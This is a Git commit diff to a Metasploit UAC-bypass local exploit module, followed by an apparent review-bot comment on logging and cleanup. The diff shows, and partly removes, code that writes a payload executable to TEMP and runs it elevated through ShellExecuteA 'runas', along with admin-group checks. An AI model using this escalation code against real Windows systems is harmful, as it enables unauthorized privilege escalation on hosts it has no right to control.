Fall back to runas if UAC disabled

bug/bundler_fix
Meatballs 2015-01-08 11:07:57 +00:00
parent 8f720ef766
commit a9fee9c022
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 6 additions and 19 deletions


@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Local
include Post::File
include Post::Windows::Priv
include Post::Windows::ReflectiveDLLInjection
include Post::Windows::Runas
def initialize(info={})
super( update_info( info,
@ -33,7 +34,9 @@ class Metasploit3 < Msf::Exploit::Local
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
'mitnick',
'mubix', # Port to local exploit
'Ben Campbell' # In memory technique
'Ben Campbell', # In memory technique
'Lesage', # Win8+ updates
'OJ Reeves' # Win 8+ updates
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
@ -76,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
runas_method(env_vars['TEMP'])
shell_execute_exe
return
end
@ -142,20 +145,6 @@ class Metasploit3 < Msf::Exploit::Local
end
end
def runas_method(temp_dir)
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
temp_exe = "#{temp_dir}\\#{payload_filename}"
print_status("Uploading payload: #{temp_exe}")
write_file(temp_exe, payload)
register_file_for_cleanup(temp_exe)
print_status("Executing payload: #{temp_exe}")
session.railgun.shell32.ShellExecuteA(nil, 'runas', temp_exe, nil, nil, 5)
print_status('Payload executed.')
end
def run_injection(pid, dll_path, file_paths)
vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
begin
@ -226,9 +215,7 @@ class Metasploit3 < Msf::Exploit::Local
if is_uac_enabled?
print_status('UAC is Enabled, checking level...')
else
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
else
unless is_in_admin_group?
fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
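Review bot: In the last hunk the UAC-disabled branch now falls through silently when the user is in the admin group, so the run output no longer records which path was taken. Adding a line such as `print_status('UAC is disabled, continuing with the runas fallback')` after the `unless` block would keep that visible to whoever reviews the log. The only runas call visible in this commit is `shell_execute_exe` under `when UAC_NO_PROMPT` in the third hunk, so whether a UAC-disabled host actually reaches it depends on code outside these hunks and should be confirmed. The removed `runas_method` called `register_file_for_cleanup(temp_exe)`, and the mixin helper that replaces it is not shown here, so it is worth checking that it still cleans up the file it writes. The enclosing method starts and ends outside the hunk.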